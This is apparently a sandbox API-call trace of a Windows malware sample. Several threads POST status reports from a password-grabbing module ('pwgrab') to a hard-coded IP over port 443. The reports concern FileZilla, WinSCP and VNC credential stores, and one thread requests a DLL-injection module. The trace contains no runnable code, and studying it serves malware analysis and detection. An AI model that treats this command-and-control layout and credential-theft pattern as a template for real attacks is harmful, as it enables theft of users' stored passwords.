	[0233.629] WinHttpSetOption (hInternet=0x26b64b0, dwOption=0x1f, lpBuffer=0x2d8f234, dwBufferLength=0x4) returned 1
	[0233.629] WinHttpSendRequest (hRequest=0x26b64b0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0233.956] WinHttpReceiveResponse (hRequest=0x26b64b0, lpReserved=0x0) returned 1
	[0233.957] WinHttpQueryHeaders (in: hRequest=0x26b64b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f224, lpdwBufferLength=0x2d8f220, lpdwIndex=0x0 | out: lpBuffer=0x2d8f224*, lpdwBufferLength=0x2d8f220*=0x4, lpdwIndex=0x0) returned 1
	[0233.957] Sleep (dwMilliseconds=0xbb8) 
	[0237.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778960) returned 1
	[0237.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7770) returned 1
	[0237.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1
	[0237.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0237.200] WinHttpCloseHandle (hInternet=0x26b64b0) returned 1
	[0237.200] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0237.200] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0237.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1

Thread:
	id = 328
	os_tid = 0xd78

	[0234.167] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0234.168] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0234.168] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0234.168] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb60
	[0234.168] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0234.168] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26cdc48
	[0234.168] WinHttpSetOption (hInternet=0x26cdc48, dwOption=0x1f, lpBuffer=0x2edf234, dwBufferLength=0x4) returned 1
	[0234.168] WinHttpSendRequest (hRequest=0x26cdc48, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0234.902] WinHttpReceiveResponse (hRequest=0x26cdc48, lpReserved=0x0) returned 1
	[0234.902] WinHttpQueryHeaders (in: hRequest=0x26cdc48, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf224, lpdwBufferLength=0x2edf220, lpdwIndex=0x0 | out: lpBuffer=0x2edf224*, lpdwBufferLength=0x2edf220*=0x4, lpdwIndex=0x0) returned 1
	[0234.902] Sleep (dwMilliseconds=0xbb8) 
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb38) returned 1
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad240) returned 1
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef70) returned 1
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0238.151] WinHttpCloseHandle (hInternet=0x26cdc48) returned 1
	[0238.151] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0238.151] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb60) returned 1

Thread:
	id = 329
	os_tid = 0xdb0

	[0234.460] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c58a0
	[0234.461] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.461] WinHttpConnect (hSession=0x22c58a0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c57b8
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27782f8
	[0234.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Filezilla: no recent servers found", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0234.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Filezilla: no recent servers found", cchWideChar=-1, lpMultiByteStr=0x22a6618, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Filezilla: no recent servers found", lpUsedDefaultChar=0x0) returned 35
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffee8
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9a8
	[0234.461] GetTickCount () returned 0xa90b78
	[0234.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311738
	[0234.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773228
	[0234.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x31eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.462] WinHttpSetTimeouts (hInternet=0x22c58a0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.462] WinHttpOpenRequest (hConnect=0x22c57b8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0234.462] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x31ef228, dwBufferLength=0x4) returned 1
	[0234.462] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB3F8\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773228*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1
	[0234.847] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0234.847] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef218, lpdwBufferLength=0x31ef214, lpdwIndex=0x0 | out: lpBuffer=0x31ef218*, lpdwBufferLength=0x31ef214*=0x4, lpdwIndex=0x0) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffee8) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9a8) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311738) returned 1
	[0234.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773228) returned 1
	[0234.848] Sleep (dwMilliseconds=0xbb8) 
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffde0) returned 1
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa070) returned 1
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778618) returned 1
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0238.089] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0238.089] WinHttpCloseHandle (hInternet=0x22c57b8) returned 1
	[0238.090] WinHttpCloseHandle (hInternet=0x22c58a0) returned 1
	[0238.090] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27782f8) returned 1

Thread:
	id = 330
	os_tid = 0xdb8

	[0234.472] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4ea8
	[0234.472] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.472] WinHttpConnect (hSession=0x22c4ea8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5248
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0234.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Filezilla: no sitemanager.xml found", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a67a0
	[0234.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Filezilla: no sitemanager.xml found", cchWideChar=-1, lpMultiByteStr=0x22a67a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Filezilla: no sitemanager.xml found", lpUsedDefaultChar=0x0) returned 36
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6378
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffa8
	[0234.472] GetTickCount () returned 0xa90b87
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311840
	[0234.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773190
	[0234.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x32eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.472] WinHttpSetTimeouts (hInternet=0x22c4ea8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.473] WinHttpOpenRequest (hConnect=0x22c5248, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x231fc00
	[0234.473] WinHttpSetOption (hInternet=0x231fc00, dwOption=0x1f, lpBuffer=0x32ef228, dwBufferLength=0x4) returned 1
	[0234.473] WinHttpSendRequest (hRequest=0x231fc00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB407\r\nContent-Length: 140\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773190*, dwOptionalLength=0x8c, dwTotalLength=0x8c, dwContext=0x0) returned 1
	[0234.984] WinHttpReceiveResponse (hRequest=0x231fc00, lpReserved=0x0) returned 1
	[0234.984] WinHttpQueryHeaders (in: hRequest=0x231fc00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef218, lpdwBufferLength=0x32ef214, lpdwIndex=0x0 | out: lpBuffer=0x32ef218*, lpdwBufferLength=0x32ef214*=0x4, lpdwIndex=0x0) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6378) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffa8) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a67a0) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311840) returned 1
	[0234.984] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773190) returned 1
	[0234.984] Sleep (dwMilliseconds=0xbb8) 
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c40) returned 1
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff8a0) returned 1
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa540) returned 1
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d30) returned 1
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27781e0) returned 1
	[0238.231] WinHttpCloseHandle (hInternet=0x231fc00) returned 1
	[0238.231] WinHttpCloseHandle (hInternet=0x22c5248) returned 1
	[0238.231] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1

Thread:
	id = 331
	os_tid = 0xd98

	[0234.606] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0234.606] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.606] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5fe0
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f20
	[0234.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileZilla passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737de0
	[0234.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileZilla passwords are empty", cchWideChar=-1, lpMultiByteStr=0x2737de0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileZilla passwords are empty", lpUsedDefaultChar=0x0) returned 30
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f48
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a28
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a40
	[0234.606] GetTickCount () returned 0xa90c04
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311948
	[0234.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773488
	[0234.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.606] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.606] WinHttpOpenRequest (hConnect=0x22c5fe0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x2777870
	[0234.606] WinHttpSetOption (hInternet=0x2777870, dwOption=0x1f, lpBuffer=0x33ef228, dwBufferLength=0x4) returned 1
	[0234.606] WinHttpSendRequest (hRequest=0x2777870, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB484\r\nContent-Length: 134\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773488*, dwOptionalLength=0x86, dwTotalLength=0x86, dwContext=0x0) returned 1
	[0235.218] WinHttpReceiveResponse (hRequest=0x2777870, lpReserved=0x0) returned 1
	[0235.218] WinHttpQueryHeaders (in: hRequest=0x2777870, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33ef218, lpdwBufferLength=0x33ef214, lpdwIndex=0x0 | out: lpBuffer=0x33ef218*, lpdwBufferLength=0x33ef214*=0x4, lpdwIndex=0x0) returned 1
	[0235.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f48) returned 1
	[0235.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a28) returned 1
	[0235.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a40) returned 1
	[0235.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737de0) returned 1
	[0235.219] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311948) returned 1
	[0235.219] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773488) returned 1
	[0235.219] Sleep (dwMilliseconds=0xbb8) 
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738498) returned 1
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff300) returned 1
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7470) returned 1
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27383a8) returned 1
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231efc0) returned 1
	[0238.478] WinHttpCloseHandle (hInternet=0x2777870) returned 1
	[0238.478] WinHttpCloseHandle (hInternet=0x22c5fe0) returned 1
	[0238.478] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0238.479] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1

Thread:
	id = 332
	os_tid = 0xd8c

	[0234.607] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c60c8
	[0234.608] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.608] WinHttpConnect (hSession=0x22c60c8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5160
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bed20
	[0234.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winscp: failed to open registry hive", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a63e8
	[0234.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winscp: failed to open registry hive", cchWideChar=-1, lpMultiByteStr=0x22a63e8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Winscp: failed to open registry hive", lpUsedDefaultChar=0x0) returned 37
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6688
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a70
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7680
	[0234.608] GetTickCount () returned 0xa90c04
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311a50
	[0234.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773520
	[0234.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x34eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.608] WinHttpSetTimeouts (hInternet=0x22c60c8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.608] WinHttpOpenRequest (hConnect=0x22c5160, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x277ea68
	[0234.608] WinHttpSetOption (hInternet=0x277ea68, dwOption=0x1f, lpBuffer=0x34ef228, dwBufferLength=0x4) returned 1
	[0234.608] WinHttpSendRequest (hRequest=0x277ea68, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB484\r\nContent-Length: 141\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773520*, dwOptionalLength=0x8d, dwTotalLength=0x8d, dwContext=0x0) returned 1
	[0234.985] WinHttpReceiveResponse (hRequest=0x277ea68, lpReserved=0x0) returned 1
	[0234.986] WinHttpQueryHeaders (in: hRequest=0x277ea68, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x34ef218, lpdwBufferLength=0x34ef214, lpdwIndex=0x0 | out: lpBuffer=0x34ef218*, lpdwBufferLength=0x34ef214*=0x4, lpdwIndex=0x0) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6688) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a70) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7680) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a63e8) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311a50) returned 1
	[0234.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773520) returned 1
	[0234.986] Sleep (dwMilliseconds=0xbb8) 
	[0238.232] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27383f8) returned 1
	[0238.232] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe28) returned 1
	[0238.232] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa648) returned 1
	[0238.232] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738448) returned 1
	[0238.232] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27384c0) returned 1
	[0238.232] WinHttpCloseHandle (hInternet=0x277ea68) returned 1
	[0238.232] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0238.233] WinHttpCloseHandle (hInternet=0x22c60c8) returned 1
	[0238.233] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1

Thread:
	id = 333
	os_tid = 0xdac

	[0234.634] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5c40
	[0234.634] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.634] WinHttpConnect (hSession=0x22c5c40, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5d28
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bef50
	[0234.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VNC passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beeb0
	[0234.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VNC passwords are empty", cchWideChar=-1, lpMultiByteStr=0x27beeb0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VNC passwords are empty", lpUsedDefaultChar=0x0) returned 24
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beff0
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b76e0
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75a8
	[0234.634] GetTickCount () returned 0xa90c23
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311c60
	[0234.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773650
	[0234.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x35eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.634] WinHttpSetTimeouts (hInternet=0x22c5c40, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.634] WinHttpOpenRequest (hConnect=0x22c5d28, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27c7920
	[0234.634] WinHttpSetOption (hInternet=0x27c7920, dwOption=0x1f, lpBuffer=0x35ef228, dwBufferLength=0x4) returned 1
	[0234.634] WinHttpSendRequest (hRequest=0x27c7920, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB4A3\r\nContent-Length: 128\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773650*, dwOptionalLength=0x80, dwTotalLength=0x80, dwContext=0x0) returned 1
	[0235.141] WinHttpReceiveResponse (hRequest=0x27c7920, lpReserved=0x0) returned 1
